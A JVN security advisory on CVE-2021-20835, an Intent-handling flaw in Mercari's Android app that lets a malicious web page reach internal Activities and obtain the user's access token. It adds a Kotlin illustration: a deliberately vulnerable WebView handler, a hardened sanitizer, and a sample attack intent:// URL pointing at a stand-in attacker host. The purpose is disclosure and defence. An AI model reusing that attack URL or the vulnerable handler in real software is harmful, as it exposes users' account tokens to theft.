JVNDB-2021-000096

Android App "Mercari (Merpay) - Marketplace and Mobile Payments App" (Japan version) vulnerable to improper handling of Intent

Overview

Android App "Mercari (Merpay) - Marketplace and Mobile Payments App" (Japan version) provided by Mercari, Inc. is vulnerable to improper handling of Intent (CWE-939).

RyotaK reported this vulnerability to Mercari, Inc. and Mercari, Inc. reported it to JPCERT/CC to disclose the vulnerability through JVN.
CVSS Severity

CVSS V3 Severity:
Base Score 7.4 (High) [IPA Score]
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Changed
  • Confidentiality Impact: High
  • Integrity Impact: None
  • Availability Impact: None
CVSS V2 Severity:
Base Score 4.3 (Medium) [IPA Score]
Vector: AV:N/AC:M/Au:N/C:P/I:N/A:N
  • Access Vector: Network
  • Access Complexity: Medium
  • Authentication: None
  • Confidentiality Impact: Partial
  • Integrity Impact: None
  • Availability Impact: None
Affected Products

Mercari Co., Ltd.
  • Mercari Android App (Japan version) versions prior to 4.49.1

The developer states that affected versions are no longer in use, because the fixed version was applied automatically the next time the application was launched.
Impact

If a user of a vulnerable version visits a malicious web page, that page can launch arbitrary Activities of the application, including Activities that were never meant to be reachable from outside the app. As a result, the access token of the user's Mercari account may be obtained by the attacker.
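The Kotlin snippet below is an added illustration of the vulnerability class named in this advisory (CWE-939, improper authorization in a handler for a custom URL scheme); it is not code from the Mercari app or from the reporter's write-up, and this page does not say which handler in the app was affected. It assumes the common shape of this bug: an in-app WebView whose `WebViewClient` forwards `intent://` URLs from web content to `startActivity()` unchanged, shown next to a hardened handler. The class names `UnsafeClient`, `SafeClient`, `sanitizeWebIntent`, the package `com.example.app`, and the sample `intent://` URL in the comment are all constructed for the example.

```kotlin
import android.app.Activity
import android.content.ActivityNotFoundException
import android.content.Context
import android.content.Intent
import android.os.Bundle
import android.webkit.WebResourceRequest
import android.webkit.WebView
import android.webkit.WebViewClient
import java.net.URISyntaxException

// Constructed example of a link an attacker page could carry (not from the
// advisory). Intent.parseUri() honours every field in the "#Intent;...;end"
// fragment, including "component=", which turns the implicit Intent into an
// explicit one aimed at a specific Activity:
//   intent://x/#Intent;scheme=https;package=com.example.app;
//     component=com.example.app/.InternalWebViewActivity;
//     S.url=https://attacker.example/collect;end
// Because startActivity() is then called from inside com.example.app itself,
// android:exported="false" on InternalWebViewActivity does not block it.

/** VULNERABLE: hands whatever the page put in the URL straight to startActivity(). */
class UnsafeClient(private val activity: Activity) : WebViewClient() {
    override fun shouldOverrideUrlLoading(view: WebView, request: WebResourceRequest): Boolean {
        val url = request.url.toString()
        if (!url.startsWith("intent:")) return false
        try {
            activity.startActivity(Intent.parseUri(url, Intent.URI_INTENT_SCHEME))
        } catch (e: URISyntaxException) {
            // malformed intent URL: ignore
        } catch (e: ActivityNotFoundException) {
            // nothing resolves: ignore
        }
        return true
    }
}

/**
 * HARDENED: reduce the parsed Intent to what a browser would forward, and
 * never let web content route back into this app's own Activities.
 */
class SafeClient(private val activity: Activity) : WebViewClient() {
    override fun shouldOverrideUrlLoading(view: WebView, request: WebResourceRequest): Boolean {
        val url = request.url.toString()
        if (!url.startsWith("intent:")) return false
        val intent = try {
            Intent.parseUri(url, Intent.URI_INTENT_SCHEME)
        } catch (e: URISyntaxException) {
            return true // consumed and dropped; never fall through to loading it
        }
        if (!sanitizeWebIntent(intent, activity)) return true
        try {
            activity.startActivity(intent)
        } catch (e: ActivityNotFoundException) {
            // A fallback to the "S.browser_fallback_url" extra would go here, but
            // only after checking it is an http(s) URL; omitted in this example.
        }
        return true
    }
}

/**
 * Returns true if [intent] may be started on behalf of web content, after
 * rewriting it in place:
 *  - drops the explicit component and the selector, so the target is chosen
 *    by intent filter only (explicit targeting is what reaches non-exported
 *    Activities of this app);
 *  - drops extras and launch flags supplied by the page;
 *  - requires CATEGORY_BROWSABLE, so only Activities that opted in to being
 *    launched from a browser can match;
 *  - refuses anything that would resolve into this app's own package.
 */
fun sanitizeWebIntent(intent: Intent, context: Context): Boolean {
    intent.component = null
    intent.selector = null
    intent.replaceExtras(Bundle())
    intent.flags = 0
    intent.addCategory(Intent.CATEGORY_BROWSABLE)
    val target = intent.resolveActivity(context.packageManager) ?: return false
    return target.packageName != context.packageName
}
```

The refusal of targets inside the app's own package is a policy choice: an app that deliberately deep-links into itself from its own WebView should route those links through a dedicated, validated handler rather than through generic `intent://` forwarding. Independently of the WebView, any internal Activity that accepts a URL or attaches a session token should validate its input even though it is not exported, since the impact described in this advisory (token disclosure) comes from such an Activity trusting whatever it was launched with.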
Solution

[Update the application]
Update the application to the latest version according to the information provided by the developer.
The developer states that no user action is needed, since the application updates itself automatically when launched.
Vendor Information

Mercari Co., Ltd.
CWE

  1. Permissions, Privileges, and Access Controls (CWE-264) [IPA Evaluation]
CVE

  1. CVE-2021-20835
References

  1. JVN : JVN#49465877
  2. National Vulnerability Database (NVD) : CVE-2021-20835
Revision History

  • [2021/10/29]
      Web page was published